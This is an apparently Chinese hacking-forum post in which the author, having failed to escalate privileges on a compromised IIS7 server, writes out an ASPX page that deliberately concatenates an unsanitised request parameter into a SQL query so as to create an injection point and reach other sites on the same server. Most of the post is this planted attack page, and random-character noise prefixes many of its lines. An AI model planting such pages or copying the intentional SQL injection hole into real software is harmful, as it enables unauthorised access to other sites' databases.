利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
/ a5 \% p+ e& R2 s$ m) r
9 ]' d) O" ^. i$ D3 S7 c​
" _/ W4 J' H1 y4 M" `' _4 w<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
0 H6 B/ J  y6 |( N+ x( {0 x3 u<html xmlns="http://www.w3.org/1999/xhtml">
- c2 t3 \* D% R6 `# s3 g$ t<head runat="server">
/ ~! l% R" O2 L; \5 Q' U9 @/ D/ r& t    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
. a' Z0 x# F9 s8 a) F    <form id="form1" runat="server">
    <div>
, A3 W& u# t6 G- n& b% ^% ]/ i     <script language="c#" runat="server">
3 q+ M; I" P& \( B            
         void page_init(object sender, EventArgs e)
         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
5 U: B0 P% R6 `5 n1 b             conn.Open();
# R4 b' K4 h' R' h! w4 L  w            
' ?2 t# h- \/ S; `# f/ a) [             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
% p/ M4 e8 Z% F# r8 Z: D            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
% B8 Q- G* e5 o  N             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
; P  D7 K/ V3 N# p- r& D0 ]             conn.Close();
/ ?/ n0 M/ z7 q2 o! D         }
7 u1 V$ Q4 H5 q5 _! S     
  </script>
& g) Y( U$ J8 N6 I    </div>
, B/ O% ~5 N- Q5 x- \0 `    </form>
</body>
</html>
& _) ~) U% H' S# D